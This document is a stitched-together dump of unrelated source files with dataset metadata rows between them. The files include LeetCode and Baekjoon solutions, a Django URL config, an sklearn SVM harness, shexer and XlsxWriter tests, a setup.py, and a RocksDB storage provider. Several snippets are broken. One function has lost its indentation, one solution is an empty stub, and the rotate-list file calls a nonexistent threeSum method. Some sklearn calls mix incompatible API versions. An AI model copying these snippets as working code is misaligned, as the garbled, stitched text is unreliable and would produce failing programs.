        return (1, None) if target >= rows[1] else (0, None)
    lo = 0
    hi = len(rows)
    while lo < hi:
        mid = (lo + hi) // 2
        if rows[mid] == target:
            return mid, True
        if mid == len(rows) - 1:
            return len(rows) - 1, None
        # rows[mid] <= target < rows[mid + 1]: target lives in row mid.
        if rows[mid] < target and rows[mid + 1] > target:
            return mid, None
        elif target > rows[mid]:
            lo = mid
        else:
            hi = mid
    return len(rows) - 1, None
def binary_search(lst, target):
    """Return True if target occurs in the sorted list lst, else False.

    Bug fix: the original advanced with `lo = mid` / `hi = mid` and only
    broke out of the stall in one branch, so e.g.
    binary_search([1, 5], 0) looped forever.  Standard inclusive-bounds
    binary search with mid +/- 1 terminates for every input.
    """
    lo, hi = 0, len(lst) - 1
    while lo <= hi:
        mid = (lo + hi) // 2
        if lst[mid] == target:
            return True
        elif lst[mid] < target:
            lo = mid + 1
        else:
            hi = mid - 1
    return False
class Solution1:
    """First approach: binary-search the first column for a candidate row,
    then binary-search inside that row.

    Relies on the module-level helpers binary_row and binary_search.
    """
    def searchMatrix(self, matrix, target):
        """
        :type matrix: List[List[int]]
        :type target: int
        :rtype: bool
        """
        # Guard: empty matrix, empty rows, or target below the smallest
        # element (binary_row assumes matrix[0][0] <= target).
        if not matrix or not matrix[0] or matrix[0][0] > target:
            return False
        # binary_row returns (row, True) on an exact first-column hit,
        # or (row, None) when that row merely may contain the target.
        row, result = binary_row([row[0] for row in matrix], target)
        if result is not None:
            return result
        return binary_search(matrix[row], target)
def _translate(index, rows, cols):
"""Returns (row, col) for overall index."""
row = index // cols
col = index % cols
return row, col
class Solution:
    def searchMatrix(self, matrix, target):
        """
        :type matrix: List[List[int]]
        :type target: int
        :rtype: bool

        Binary search over the matrix viewed as one sorted sequence of
        m*n values; divmod maps a flat index back to (row, col).
        """
        if not matrix or not matrix[0]:
            return False
        num_rows, num_cols = len(matrix), len(matrix[0])
        lo, hi = 0, num_rows * num_cols - 1  # inclusive flat-index bounds
        while lo <= hi:
            mid = (lo + hi) // 2
            r, c = divmod(mid, num_cols)
            value = matrix[r][c]
            if value == target:
                return True
            if value < target:
                lo = mid + 1
            else:
                hi = mid - 1
        return False
# Smoke tests for Solution.searchMatrix (run on import).
s = Solution()
assert not s.searchMatrix([[-10,-8,-8,-8],[-5,-4,-2,0]], 7)
assert s.searchMatrix([[1, 3, 5, 7],[10, 11, 16, 20],[23, 30, 34, 50]], 3)
assert not s.searchMatrix([[1, 3, 5, 7],[10, 11, 16, 20],[23, 30, 34, 50]], 13)
assert not s.searchMatrix([[1, 1]], 0)
assert not s.searchMatrix([[1, 1]], 2)
# NOTE(review): duplicate of the first assertion above.
assert not s.searchMatrix([[-10,-8,-8,-8],[-5,-4,-2,0]], 7)
print('All tests passed!')
|
[
"[email protected]"
] | |
8f9842cabc131fddc1025c2ab9121b0af86a3297
|
d9a65120e6b8d20d3b568acde8ceb66f908d1ffc
|
/django1/src/vote/urls.py
|
68755a03d624470c3b5e239836982709943bda16
|
[] |
no_license
|
omniverse186/django1
|
aba57d705bd7b3a142f627e566853811038d6d6c
|
f257c34c9d09467170a5f3bd24598d97dcf64f4f
|
refs/heads/master
| 2020-04-21T23:11:17.677609 | 2019-02-10T03:20:47 | 2019-02-10T03:20:47 | 169,938,176 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 838 |
py
|
'''
Created on 2019. 1. 20.

@author: user
'''
# App-level (sub) URLConf for the vote app.
# app_name : namespace grouping the URL names registered here.
# urlpatterns : list registering each URL pattern with its view function.
from django.urls import path
from .views import *

app_name = 'vote'

urlpatterns = [
    # name : alias for this URL/view registration (used for reverse lookup)
    path('', index, name= 'index'),
    path('<int:q_id>/', detail, name='detail'),
    path('vote/', vote, name='vote'),
    path('result/<int:q_id>',result, name='result'),
    path('qr/', qregister, name='qr' ),
    path('qu/<int:q_id>/', qupdate, name = 'qu'),
    path('qd/<int:q_id>/', qdelete, name='qd'),
    path('cr/', cregister, name='cr'),
    path('cu/<int:c_id>/', cupdate, name='cu'),
    path('cd/<int:c_id>/', cdelete, name='cd')
]
|
[
"user@DESKTOP-37GULAI"
] |
user@DESKTOP-37GULAI
|
1c98f010be779b0df3ae626d838b4e5e5e86525c
|
d24e06a9fb04ada28de067be1b6be50a7a92f294
|
/Assignment1/svm_test.py
|
c916d079fcf86ddccff119130ecb3486e4f6dee4
|
[] |
no_license
|
sentientmachine/CS7641
|
3960b3e216f1eddc9a782318a9bf3ae38fed1959
|
a9a1369acfdd3e846e311c64498a38c8afd8fcc2
|
refs/heads/master
| 2020-12-25T03:11:46.621886 | 2017-12-24T12:24:14 | 2017-12-24T12:24:14 | 51,779,034 | 0 | 0 | null | 2016-02-15T19:17:10 | 2016-02-15T19:17:10 | null |
UTF-8
|
Python
| false | false | 4,649 |
py
|
import io
import pydotplus
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
from sklearn.svm import SVC
from sklearn.model_selection import StratifiedKFold
from sklearn.pipeline import Pipeline
from sklearn.preprocessing import MinMaxScaler, StandardScaler, OneHotEncoder, Imputer
#from sklearn.metrics import accuracy_score
from plot_curves import *
class rb_svm_test:
    """SVM experiment harness: fit/score an SVC on held-out data with
    optional cross-validation, learning curves, validation curves and
    decision-boundary plots."""

    def __init__(self, x_train, x_test, y_train, y_test, x_col_names, data_label, cv):
        self.x_train = x_train
        self.x_test = x_test
        self.y_train = y_train
        self.y_test = y_test
        self.x_col_names = x_col_names
        self.data_label = data_label
        self.cv = cv  # number of cross-validation folds

    def run_cv_model(self, C=1.0, degree=3, cache_size=200, do_plot=True):
        """Stratified k-fold CV; returns (mean train score, mean test score)."""
        # use k-fold cross validation
        # we need to standardize the data for the KNN learner
        pipe_clf = Pipeline([ ('scl', StandardScaler() ),
                    ('clf', SVC(C=C, degree=degree, cache_size=cache_size))])

        # resample the test data without replacement. This means that each data point is part of a test a
        # training set only once. (paraphrased from Raschka p.176). In Stratified KFold, the features are
        # evenly disributed such that each test and training set is an accurate representation of the whole
        # this is the 0.17 version
        #kfold = StratifiedKFold(y=self.y_train, n_folds=self.cv, random_state=0)

        # this is the 0.18dev version
        # NOTE(review): sklearn >= 0.18 renamed n_folds to n_splits; this
        # call may need updating depending on the pinned sklearn version.
        skf = StratifiedKFold(n_folds=self.cv, random_state=0)

        # do the cross validation
        train_scores = []
        test_scores = []
        #for k, (train, test) in enumerate(kfold):
        for k, (train, test) in enumerate(skf.split(X=self.x_train, y=self.y_train)):
            # run the learning algorithm
            pipe_clf.fit(self.x_train[train], self.y_train[train])
            train_score = pipe_clf.score(self.x_train[test], self.y_train[test])
            train_scores.append(train_score)
            test_score = pipe_clf.score(self.x_test, self.y_test)
            test_scores.append(test_score)
            print('Fold:', k+1, ', Training score:', train_score, ', Test score:', test_score)

        train_score = np.mean(train_scores)
        print('Training score is', train_score)

        test_score = np.mean(test_scores)
        print('Test score is', test_score)

        if do_plot:
            self.__plot_learning_curve(pipe_clf)

        return train_score, test_score

    def run_model(self, C=1.0, degree=3, cache_size=200, do_plot=True):
        """Single fit on the full training set; returns (train, test) scores."""
        # we need to standardize the data for the learner
        pipe_clf = Pipeline([ ('scl', StandardScaler() ),
                    ('clf', SVC(C=C, degree=degree, cache_size=cache_size))])

        # test it: this should match the non-pipelined call
        pipe_clf.fit(self.x_train, self.y_train)

        # check model accuracy
        train_score = pipe_clf.score(self.x_train, self.y_train)
        print('Training score is', train_score)

        test_score = pipe_clf.score(self.x_test, self.y_test)
        print('Test score is', test_score)

        if do_plot:
            self.__plot_learning_curve(pipe_clf)
            self.__plot_decision_boundaries(pipe_clf)

        return train_score, test_score

    def __plot_learning_curve(self, estimator):
        plc = rb_plot_curves()
        plc.plot_learning_curve(estimator, self.x_train, self.y_train, self.cv, self.data_label)

    def plot_validation_curve(self, C=1.0, degree=3, cache_size=200):
        """Plot a validation curve over the SVC regularisation parameter C."""
        estimator = Pipeline([ ('scl', StandardScaler() ),
                    ('clf', SVC(C=C, degree=degree, cache_size=cache_size))])

        param_names = ['clf__C']
        param_ranges = [np.arange(1.0,10.0,1.)]
        data_label = self.data_label

        plc = rb_plot_curves()
        for i in range(len(param_names)):
            param_name = param_names[i]
            param_range = param_ranges[i]
            plc.plot_validation_curve(estimator, self.x_train, self.y_train,
                                      self.cv, data_label,
                                      param_range, param_name)

    def __plot_decision_boundaries(self, estimator):
        plc = rb_plot_curves()
        features = pd.DataFrame(self.x_train)
        features.columns = self.x_col_names
        plc.plot_decision_boundaries(estimator, features, self.y_train, self.data_label)
|
[
"="
] |
=
|
a688ca2e222977722e0df277f47979059d2e8e1b
|
99eb4013a12ddac44042d3305a16edac1c9e2d67
|
/test/test_raw_shape_map.py
|
1a6b72fc298a5b35beaa25426e64cdf336fc34fa
|
[
"Apache-2.0"
] |
permissive
|
DaniFdezAlvarez/shexer
|
cd4816991ec630a81fd9dd58a291a78af7aee491
|
7ab457b6fa4b30f9e0e8b0aaf25f9b4f4fcbf6d9
|
refs/heads/master
| 2023-05-24T18:46:26.209094 | 2023-05-09T18:25:27 | 2023-05-09T18:25:27 | 132,451,334 | 24 | 2 |
Apache-2.0
| 2023-05-03T18:39:57 | 2018-05-07T11:32:26 |
Python
|
UTF-8
|
Python
| false | false | 4,212 |
py
|
import unittest
from shexer.shaper import Shaper
from test.const import G1, BASE_FILES, default_namespaces
from test.t_utils import file_vs_str_tunned_comparison
import os.path as pth
from shexer.consts import TURTLE
_BASE_DIR = BASE_FILES + "shape_map" + pth.sep
class TestRawShapeMap(unittest.TestCase):
    """Exercise every raw shape-map selector syntax accepted by Shaper.

    Each test feeds one selector form (node IRI, prefixed node, FOCUS
    triple pattern, wildcard, SPARQL query, multiple items) and compares
    the generated ShEx against a golden file under _BASE_DIR.
    """

    def test_node(self):
        # Absolute-IRI node selector.
        shape_map = "<http://example.org/Jimmy>@<Person>"
        shaper = Shaper(graph_file_input=G1,
                        namespaces_dict=default_namespaces(),
                        all_classes_mode=False,
                        input_format=TURTLE,
                        disable_comments=True,
                        shape_map_raw=shape_map
                        )
        str_result = shaper.shex_graph(string_output=True)
        self.assertTrue(file_vs_str_tunned_comparison(file_path=_BASE_DIR + "a_node.shex",
                                                      str_target=str_result))

    def test_prefixed_node(self):
        # Prefixed-name node selector; must produce the same shape as the
        # absolute-IRI form above.
        shape_map = "ex:Jimmy@<Person>"
        shaper = Shaper(graph_file_input=G1,
                        namespaces_dict=default_namespaces(),
                        all_classes_mode=False,
                        input_format=TURTLE,
                        disable_comments=True,
                        shape_map_raw=shape_map
                        )
        str_result = shaper.shex_graph(string_output=True)
        self.assertTrue(file_vs_str_tunned_comparison(file_path=_BASE_DIR + "a_node.shex",
                                                      str_target=str_result))

    def test_focus(self):
        # FOCUS selector: every node matching the triple pattern.
        shape_map = "{FOCUS a foaf:Person}@<Person>"
        shaper = Shaper(graph_file_input=G1,
                        namespaces_dict=default_namespaces(),
                        all_classes_mode=False,
                        input_format=TURTLE,
                        disable_comments=True,
                        shape_map_raw=shape_map
                        )
        str_result = shaper.shex_graph(string_output=True)
        self.assertTrue(file_vs_str_tunned_comparison(file_path=_BASE_DIR + "focus_nodes.shex",
                                                      str_target=str_result))

    def test_focus_wildcard(self):
        # Wildcard object (_): any node that has a foaf:name.
        shape_map = "{FOCUS foaf:name _}@<WithName>"
        shaper = Shaper(graph_file_input=G1,
                        namespaces_dict=default_namespaces(),
                        all_classes_mode=False,
                        input_format=TURTLE,
                        disable_comments=True,
                        shape_map_raw=shape_map
                        )
        str_result = shaper.shex_graph(string_output=True)
        self.assertTrue(file_vs_str_tunned_comparison(file_path=_BASE_DIR + "focus_and_wildcard.shex",
                                                      str_target=str_result))

    def test_sparql_selector(self):
        # SPARQL selector; equivalent to the FOCUS form in test_focus.
        shape_map = "SPARQL \"select ?p where { ?p a foaf:Person }\"@<Person>"
        shaper = Shaper(graph_file_input=G1,
                        namespaces_dict=default_namespaces(),
                        all_classes_mode=False,
                        input_format=TURTLE,
                        disable_comments=True,
                        shape_map_raw=shape_map
                        )
        str_result = shaper.shex_graph(string_output=True)
        self.assertTrue(file_vs_str_tunned_comparison(file_path=_BASE_DIR + "focus_nodes.shex",
                                                      str_target=str_result))

    def test_several_shapemap_items(self):
        # Two newline-separated shape-map items in one raw string.
        shape_map = "{FOCUS a foaf:Person}@<Person>\n{FOCUS a foaf:Document}@<Document>"
        shaper = Shaper(graph_file_input=G1,
                        namespaces_dict=default_namespaces(),
                        all_classes_mode=False,
                        input_format=TURTLE,
                        disable_comments=True,
                        shape_map_raw=shape_map
                        )
        str_result = shaper.shex_graph(string_output=True)
        self.assertTrue(file_vs_str_tunned_comparison(file_path=_BASE_DIR + "several_shm_items.shex",
                                                      str_target=str_result))
|
[
"[email protected]"
] | |
3e034a11bde11aa6a40bca38c774c9dba4dc8ef4
|
9b422078f4ae22fe16610f2ebc54b8c7d905ccad
|
/xlsxwriter/test/comparison/test_chart_format07.py
|
45e9369b2bac7462c137134173b1cda4559f1696
|
[
"BSD-2-Clause-Views"
] |
permissive
|
projectsmahendra/XlsxWriter
|
73d8c73ea648a911deea63cb46b9069fb4116b60
|
9b9d6fb283c89af8b6c89ad20f72b8208c2aeb45
|
refs/heads/master
| 2023-07-21T19:40:41.103336 | 2023-07-08T16:54:37 | 2023-07-08T16:54:37 | 353,636,960 | 0 | 0 |
NOASSERTION
| 2021-04-01T08:57:21 | 2021-04-01T08:57:20 | null |
UTF-8
|
Python
| false | false | 1,582 |
py
|
###############################################################################
#
# Tests for XlsxWriter.
#
# Copyright (c), 2013-2021, John McNamara, [email protected]
#
from ..excel_comparison_test import ExcelComparisonTest
from ...workbook import Workbook
class TestCompareXLSXFiles(ExcelComparisonTest):
    """
    Test file created by XlsxWriter against a file created by Excel.
    """

    def setUp(self):
        # Golden workbook to compare the generated output against.
        self.set_filename('chart_format07.xlsx')

    def test_create_file(self):
        """Test the creation of an XlsxWriter file with chart formatting."""
        workbook = Workbook(self.got_filename)

        worksheet = workbook.add_worksheet()
        chart = workbook.add_chart({'type': 'line'})

        # Fixed axis ids so the XML matches the golden file exactly.
        chart.axis_ids = [46163840, 46175360]

        data = [
            [1, 2, 3, 4, 5],
            [2, 4, 6, 8, 10],
            [3, 6, 9, 12, 15],
        ]

        worksheet.write_column('A1', data[0])
        worksheet.write_column('B1', data[1])
        worksheet.write_column('C1', data[2])

        # First series carries the marker formatting under test.
        chart.add_series({
            'categories': '=Sheet1!$A$1:$A$5',
            'values': '=Sheet1!$B$1:$B$5',
            'marker': {
                'type': 'square',
                'size': 5,
                'line': {'color': 'yellow'},
                'fill': {'color': 'red'},
            },
        })

        # Second series is unformatted.
        chart.add_series({
            'categories': '=Sheet1!$A$1:$A$5',
            'values': '=Sheet1!$C$1:$C$5',
        })

        worksheet.insert_chart('E9', chart)

        workbook.close()

        self.assertExcelEqual()
|
[
"[email protected]"
] | |
35eada1e6e31e47d1156a2dd8c85c2aada530ebe
|
4fbd844113ec9d8c526d5f186274b40ad5502aa3
|
/algorithms/python3/pacific_atlantic_water_flow.py
|
6a5e0384ee2afe8a2dd84a801719431deeaa3b09
|
[] |
no_license
|
capric8416/leetcode
|
51f9bdc3fa26b010e8a1e8203a7e1bcd70ace9e1
|
503b2e303b10a455be9596c31975ee7973819a3c
|
refs/heads/master
| 2022-07-16T21:41:07.492706 | 2020-04-22T06:18:16 | 2020-04-22T06:18:16 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,244 |
py
|
# !/usr/bin/env python
# -*- coding: utf-8 -*-
"""
Given an m x n matrix of non-negative integers representing the height of each unit cell in a continent, the "Pacific ocean" touches the left and top edges of the matrix and the "Atlantic ocean" touches the right and bottom edges.
Water can only flow in four directions (up, down, left, or right) from a cell to another one with height equal or lower.
Find the list of grid coordinates where water can flow to both the Pacific and Atlantic ocean.
Note:
The order of returned grid coordinates does not matter.
Both m and n are less than 150.
Example:
Given the following 5x5 matrix:
Pacific ~ ~ ~ ~ ~
~ 1 2 2 3 (5) *
~ 3 2 3 (4) (4) *
~ 2 4 (5) 3 1 *
~ (6) (7) 1 4 5 *
~ (5) 1 1 2 4 *
* * * * * Atlantic
Return:
[[0, 4], [1, 3], [1, 4], [2, 2], [3, 0], [3, 1], [4, 0]] (positions with parentheses in above matrix).
"""
""" ==================== body ==================== """
class Solution:
    # TODO(review): unimplemented stub -- currently returns None instead
    # of the list of coordinates reaching both oceans.
    def pacificAtlantic(self, matrix):
        """
        :type matrix: List[List[int]]
        :rtype: List[List[int]]
        """
""" ==================== body ==================== """
|
[
"[email protected]"
] | |
39f51b8befba9f505afddabff3d6d21823fa7df5
|
adb759899204e61042225fabb64f6c1a55dac8ce
|
/1900~1999/1904.py
|
8a490e0cc71ac769e26193e2bc6f97c4d01e51cb
|
[] |
no_license
|
geneeol/baekjoon-online-judge
|
21cdffc7067481b29b18c09c9152135efc82c40d
|
2b359aa3f1c90f178d0c86ce71a0580b18adad6f
|
refs/heads/master
| 2023-03-28T23:25:12.219487 | 2021-04-01T09:19:06 | 2021-04-01T09:19:06 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,478 |
py
|
# 문제
# 지원이에게 2진 수열을 가르쳐 주기 위해, 지원이 아버지는 그에게 타일들을 선물해주셨다.
# 그리고 이 각각의 타일들은 0 또는 1이 쓰여 있는 낱장의 타일들이다.
# 어느 날 짓궂은 동주가 지원이의 공부를 방해하기 위해 0이 쓰여진 낱장의 타일들을 붙여서 한 쌍으로 이루어진 00 타일들을 만들었다.
# 결국 현재 1 하나만으로 이루어진 타일 또는 0타일을 두 개 붙인 한 쌍의 00타일들만이 남게 되었다.
# 그러므로 지원이는 타일로 더 이상 크기가 N인 모든 2진 수열을 만들 수 없게 되었다.
# 예를 들어, N=1일 때 1만 만들 수 있고, N=2일 때는 00, 11을 만들 수 있다. (01, 10은 만들 수 없게 되었다.)
# 또한 N=4일 때는 0011, 0000, 1001, 1100, 1111 등 총 5개의 2진 수열을 만들 수 있다.
# 우리의 목표는 N이 주어졌을 때 지원이가 만들 수 있는 모든 가짓수를 세는 것이다.
# 단 타일들은 무한히 많은 것으로 가정하자.
#
# 입력
# 첫 번째 줄에 자연수 N이 주어진다.(N ≤ 1,000,000)
#
# 출력
# 첫 번째 줄에 지원이가 만들 수 있는 길이가 N인 모든 2진 수열의 개수를 15746으로 나눈 나머지를 출력한다.
# Count length-N binary sequences buildable from "1" tiles and "00" tiles,
# modulo 15746 (Baekjoon 1904).  dp[i] = dp[i-1] (append a "1" tile)
#                                      + dp[i-2] (append a "00" tile).
N = int(input())
MOD = 15746

# Only compute up to N instead of always filling a 1,000,001-entry table.
size = max(N, 2)
dp = [0] * (size + 1)
dp[1] = 1
dp[2] = 2
for i in range(3, N + 1):
    dp[i] = (dp[i - 1] + dp[i - 2]) % MOD

print(dp[N])
|
[
"[email protected]"
] | |
bd0aee949be51e9122bd5c53c9a3f1bed2200067
|
1865a8508bed279961abaef324b434c0e3caa815
|
/setup.py
|
261fb583f89174f98ea47d3f5b9b3cadf5e81b6b
|
[
"MIT"
] |
permissive
|
zidarsk8/simple_wbd
|
de68cbefe94fda52ed5330ff55b97b4a73aedfb4
|
6c2d1611ffd70d3bf4468862b0b569131ef12d94
|
refs/heads/master
| 2021-01-19T10:54:38.824763 | 2016-08-16T03:58:42 | 2016-08-16T03:58:42 | 59,942,658 | 3 | 1 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,866 |
py
|
#!/usr/bin/env python3
"""Simplo wbd setup file.
This is the main setup for simple wbd. To manually install this module run:
$ pip install .
For development to keep track of the changes in the module and to include
development and test dependecies run:
$ pip install --editable .[dev,test]
"""
from setuptools import setup
def get_description():
    """Return the package long description read from README.rst.

    The encoding is pinned to UTF-8: the built-in default is
    locale-dependent and can fail on non-UTF-8 systems.
    """
    with open("README.rst", encoding="utf-8") as f:
        return f.read()
if __name__ == "__main__":
setup(
name="simple_wbd",
version="0.5.1",
license="MIT",
author="Miha Zidar",
author_email="[email protected]",
description=("A simple python interface for World Bank Data Indicator "
"and Climate APIs"),
long_description=get_description(),
url="https://github.com/zidarsk8/simple_wbd",
download_url="https://github.com/zidarsk8/simple_wbd/tarball/0.5.1",
packages=["simple_wbd"],
provides=["simple_wbd"],
install_requires=[
"pycountry"
],
extras_require={
"dev": [
"pylint"
],
"test": [
"codecov",
"coverage",
"mock",
"nose",
"vcrpy",
],
},
test_suite="tests",
keywords = [
"World Bank Data",
"indicator api",
"climate api",
],
classifiers=[
"Development Status :: 4 - Beta",
"Environment :: Console",
"Intended Audience :: Developers",
"Intended Audience :: Science/Research",
"License :: OSI Approved :: MIT License",
"Operating System :: OS Independent",
"Programming Language :: Python :: 3",
"Topic :: Scientific/Engineering",
],
)
|
[
"[email protected]"
] | |
e0d852a289aa3a8e3aca62072d98ba4f2cf26939
|
33524b5c049f934ce27fbf046db95799ac003385
|
/2018/Other/Urok_10_0_классы_объекты/teoriya_class_0.py
|
68f7a2ba67558f66e7e39854b191bc7d8ef21224
|
[] |
no_license
|
mgbo/My_Exercise
|
07b5f696d383b3b160262c5978ad645b46244b70
|
53fb175836717493e2c813ecb45c5d5e9d28dd23
|
refs/heads/master
| 2022-12-24T14:11:02.271443 | 2020-10-04T04:44:38 | 2020-10-04T04:44:38 | 291,413,440 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 758 |
py
|
from math import pi
class Circle:
    """A circle with centre (x, y) and radius r."""

    def __init__(self, x=0, y=0, r=0):
        self.x = x
        self.y = y
        self.r = r

    def __str__(self):
        return "({},{},{})".format(self.x, self.y, self.r)

    def read(self):
        """Read "x y r" as whitespace-separated integers from stdin."""
        self.x, self.y, self.r = (int(v) for v in input().split())

    def area(self):
        """Return the area pi * r**2."""
        return pi * self.r ** 2

    def perimetr(self):
        """Return the circumference 2 * pi * r (name kept from original API)."""
        return 2 * pi * self.r

    def zoom(self, k):
        """Scale the radius in place by factor k."""
        self.r = self.r * k

    def is_crossed(self, c):
        """Return True if this circle and circle c intersect or touch."""
        centre_gap_sq = (self.x - c.x) ** 2 + (self.y - c.y) ** 2
        return centre_gap_sq <= (self.r + c.r) ** 2
# Driver: build two circles from standard input and echo them.
c1 = Circle()
c2 = Circle()
# Hard-coded sample setup kept (disabled) for reference:
'''
c1.r = 3
c2.r = 5
c2.x = 1
c2.y = 1
'''
# Each read() consumes one "x y r" line from stdin.
c1.read()
c2.read()
print (c1)
print (c2)
'''
ans = c1.area()
print (ans)
'''
[
"[email protected]"
] | |
bbf5068fcd5c3270cf2448fddc69044e5fb04048
|
ddac7346ca9f1c1d61dfd7b3c70dc6cd076a9b49
|
/tests/test_calculators.py
|
ea4ae7c9ee767f607d8382ac221cc57272a8fee0
|
[
"MIT"
] |
permissive
|
gvenus/dftfit
|
f8cf5e9bef5a173ff0aa7202bacbfee0df61bd14
|
a00354f8f0d611bf57c6925f920c749d8628cf98
|
refs/heads/master
| 2023-03-17T18:58:52.287217 | 2019-10-20T04:07:44 | 2019-10-20T04:07:44 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,979 |
py
|
import asyncio
import shutil
import pymatgen as pmg
import numpy as np
import pytest
from dftfit.io.lammps import LammpsLocalDFTFITCalculator
from dftfit.io.lammps_cython import LammpsCythonDFTFITCalculator
from dftfit.cli.utils import load_filename
from dftfit.potential import Potential
@pytest.mark.pymatgen_lammps
@pytest.mark.lammps_cython
@pytest.mark.calculator
def test_calculator_equivalency(structure):
target_a = 4.1990858
s = structure('test_files/structure/MgO.cif')
lattice = pmg.Lattice.from_parameters(target_a, target_a, target_a, 90, 90, 90)
s.modify_lattice(lattice)
assert np.all(np.isclose(s.lattice.abc, (target_a, target_a, target_a)))
s = s * (2, 2, 2)
assert len(s) == 64
base_directory = 'test_files/dftfit_calculators/'
potential_schema = load_filename(base_directory + 'potential.yaml')
potential_schema['spec']['charge']['Mg']['initial'] = 1.4
potential_schema['spec']['charge']['O']['initial'] = -1.4
potential = Potential(potential_schema)
command = None
if shutil.which('lammps'): command = 'lammps'
elif shutil.which('lmp_serial'): command = 'lmp_serial'
calculators = [
LammpsLocalDFTFITCalculator(structures=[s], potential=potential, command=command, num_workers=1),
LammpsCythonDFTFITCalculator(structures=[s], potential=potential)
]
loop = asyncio.get_event_loop()
results = []
async def run(calc, potential):
await calc.create()
return await calc.submit(potential)
for calc in calculators:
results.append(loop.run_until_complete(run(calc, potential)))
assert len(results) == 2
assert len(results[0]) == 1
assert len(results[1]) == 1
for r1, r2 in zip(*results):
assert r1.structure == r2.structure
assert abs(r1.energy - r2.energy) < 1e-4
assert np.all(np.isclose(r1.forces, r2.forces, atol=1e-8))
assert np.all(np.isclose(r1.stress, r2.stress, atol=1e-8))
|
[
"[email protected]"
] | |
bde27465e5215f809b247a635fd24f3186193786
|
0698be34413debeb570e2560072c5696433acd81
|
/ForkTube/celeryconfig.py
|
1a437d56f6e0390a359e88338fe971e211e45e34
|
[] |
no_license
|
Miserlou/ForkTube
|
90a057c459fda4b8d92d94f89c9d86bf786549ca
|
848fdf4ff81c1d70b03c30a6382c8464dd4f25fe
|
refs/heads/master
| 2020-05-19T07:47:44.130888 | 2012-04-09T19:53:24 | 2012-04-09T19:53:24 | 2,363,212 | 1 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 184 |
py
|
BROKER_HOST = "localhost"
BROKER_PORT = 5672
BROKER_USER = "myuser"
BROKER_PASSWORD = "mypassword"
BROKER_VHOST = "myvhost"
CELERY_RESULT_BACKEND = "amqp"
CELERY_IMPORTS = ("tasks", )
|
[
"[email protected]"
] | |
38bae379c04d24789026484a687ef0293b07e1f4
|
d346c1e694e376c303f1b55808d90429a1ad3c3a
|
/medium/61.rotate_list.py
|
86f5af201842b8ba886e5132edcc3439263c61a5
|
[] |
no_license
|
littleliona/leetcode
|
3d06bc27c0ef59b863a2119cd5222dc94ed57b56
|
789d8d5c9cfd90b872be4a4c35a34a766d95f282
|
refs/heads/master
| 2021-01-19T11:52:11.938391 | 2018-02-19T03:01:47 | 2018-02-19T03:01:47 | 88,000,832 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,234 |
py
|
# Definition for singly-linked list.
# class ListNode:
# def __init__(self, x):
# self.val = x
# self.next = None
class Solution:
def rotateRight(self, head, k):
"""
:type head: ListNode
:type k: int
:rtype: ListNode
"""
#
current = head
storeList = []
while current != None:
storeList.append(current)
current = current.next
if len(storeList) <= 1:
return head
k = k % len(storeList)
if k == 0:
return head
res = storeList[-k]
storeList[-k - 1].next = None
storeList[-1].next = head
return res
#mine
if not head or not head.next or k == 0:
return head
length_list = 1
current = head
while current.next:
current = current.next
length_list += 1
current.next = head
current = head
for i in range(1,length_list - (k % length_list)):
current = current.next
head = current.next
current.next = None
return head
s = Solution()
a = s.threeSum([-1,0,1,2,-1,-4])
print(a)
|
[
"[email protected]"
] | |
3610918d2b73d9d7fb9529196d9121b89800d8c4
|
03901933adfaa9130979b36f1e42fb67b1e9f850
|
/iotapy/storage/providers/rocksdb.py
|
a1b6d630c97ebda8f54229ab370820ab8f9b63f1
|
[
"MIT"
] |
permissive
|
aliciawyy/iota-python
|
03418a451b0153a1c55b3951d18d4cb533c7ff28
|
b8d421acf94ccd9e7374f799fbe496f6d23e3cf3
|
refs/heads/master
| 2020-03-19T04:15:54.594313 | 2018-06-04T18:26:52 | 2018-06-04T18:26:52 | 135,811,581 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 7,363 |
py
|
# -*- coding: utf-8 -*-
import struct
import iota
import rocksdb_iota
import iotapy.storage.providers.types
from rocksdb_iota.merge_operators import StringAppendOperator
from iotapy.storage import converter
KB = 1024
MB = KB * 1024
MERGED = ['tag', 'bundle', 'approvee', 'address', 'state_diff']
class RocksDBProvider:
BLOOM_FILTER_BITS_PER_KEY = 10
column_family_names = [
b'default',
b'transaction',
b'transaction-metadata',
b'milestone',
b'stateDiff',
b'address',
b'approvee',
b'bundle',
b'tag'
]
column_family_python_mapping = {
'transaction_metadata': 'transaction-metadata',
'state_diff': 'stateDiff'
}
def __init__(self, db_path, db_log_path, cache_size=4096, read_only=True):
self.db = None
self.db_path = db_path
self.db_log_path = db_log_path
self.cache_size = cache_size
self.read_only = read_only
self.available = False
def init(self):
self.init_db(self.db_path, self.db_log_path)
self.available = True
def init_db(self, db_path, db_log_path):
options = rocksdb_iota.Options(
create_if_missing=True,
db_log_dir=db_log_path,
max_log_file_size=MB,
max_manifest_file_size=MB,
max_open_files=10000,
max_background_compactions=1
)
options.allow_concurrent_memtable_write = True
# XXX: How to use this?
block_based_table_config = rocksdb_iota.BlockBasedTableFactory(
filter_policy=rocksdb_iota.BloomFilterPolicy(self.BLOOM_FILTER_BITS_PER_KEY),
block_size_deviation=10,
block_restart_interval=16,
block_cache=rocksdb_iota.LRUCache(self.cache_size * KB),
block_cache_compressed=rocksdb_iota.LRUCache(32 * KB, shard_bits=10))
options.table_factory = block_based_table_config
# XXX: How to use this?
column_family_options = rocksdb_iota.ColumnFamilyOptions(
merge_operator=StringAppendOperator(),
table_factory=block_based_table_config,
max_write_buffer_number=2,
write_buffer_size=2 * MB)
try:
self.db = rocksdb_iota.DB(
self.db_path, options, self.column_family_names,
read_only=self.read_only)
except rocksdb_iota.errors.InvalidArgument as e:
if 'Column family not found' in str(e):
# Currently, rocksdb_iota didn't support
# "create_if_column_family_missing" option, if we detect this
# is a new database, we will need to create its whole
# column family manually.
self.db = rocksdb_iota.DB(
self.db_path, options, [b'default'], read_only=self.read_only)
# Skip to create b'default'
for column_family in self.column_family_names[1:]:
self.db.create_column_family(column_family)
else:
raise e
def _convert_column_to_handler(self, column):
if not isinstance(column, str):
raise TypeError('Column type should be str')
